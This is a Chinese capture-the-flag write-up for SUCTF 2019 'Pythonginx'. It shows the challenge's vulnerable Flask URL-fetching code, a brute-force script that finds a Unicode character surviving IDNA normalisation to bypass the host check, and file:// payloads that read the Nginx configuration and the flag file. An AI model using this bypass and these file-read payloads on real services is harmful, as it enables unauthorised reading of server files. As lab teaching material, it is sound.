[SUCTF 2019]Pythonginx
作者:互联网
打开就是源码
@app.route('/getUrl', methods=['GET', 'POST'])
def getUrl():
url = request.args.get("url")
host = parse.urlparse(url).hostname
if host == 'suctf.cc':
return "我扌 your problem? 111"
parts = list(urlsplit(url))
host = parts[1]
if host == 'suctf.cc':
return "我扌 your problem? 222 " + host
newhost = []
for h in host.split('.'):
newhost.append(h.encode('idna').decode('utf-8'))
parts[1] = '.'.join(newhost)
#去掉 url 中的空格
finalUrl = urlunsplit(parts).split(' ')[0]
host = parse.urlparse(finalUrl).hostname
if host == 'suctf.cc':
return urllib.request.urlopen(finalUrl).read()
else:
return "我扌 your problem? 333"
审计后知道,我们要绕过前面两个if执行第三个if进行读取文件。
第三个if判断前进行了编码和解码,我们要找到一个字符S,放入suctf.cS中,满足解码前不符合suctf.cS==suctf.cc,
解码后满足。
爆破脚本:
from urllib.parse import urlparse, urlunsplit, urlsplit
from urllib import parse
def outres():
for x in range(10000):
char = chr(x)
url = "http://suctf.c{}".format(char)
try:
if checkurl(url):
print("the char {}:{}:{} is available".format(x,chr(x),hex(x)))
except:
pass
def checkurl(url):
url = url
host = parse.urlparse(url).hostname
if host == 'suctf.cc':
return False
parts = list(urlsplit(url))
host = parts[1]
if host == 'suctf.cc':
return False
newhost = []
for h in host.split('.'):
newhost.append(h.encode('idna').decode('utf-8'))
parts[1] = '.'.join(newhost)
res = urlunsplit(parts).split(' ')[0]
host = parse.urlparse(res).hostname
if host == 'suctf.cc':
return True
else:
return False
if __name__ == '__main__':
outres()
结果:
这里用 Ⅽ
Nginx配置:
配置文件存放目录:/etc/nginx
主配置文件:/etc/nginx/conf/nginx.conf
管理脚本:/usr/lib64/systemd/system/nginx.service
模块:/usr/lisb64/nginx/modules
应用程序:/usr/sbin/nginx
程序默认存放位置:/usr/share/nginx/html
日志默认存放位置:/var/log/nginx
配置文件目录为:/usr/local/nginx/conf/nginx.conf
payload:
getUrl?url=file://suctf.cⅭ/usr/local/nginx/conf/nginx.conf
看到了/usr/fffffflag
getUrl?url=file://suctf.cⅭ/usr/fffffflag
标签:SUCTF,suctf,return,url,nginx,host,parts,2019,Pythonginx 来源: https://blog.csdn.net/fmyyy1/article/details/114916207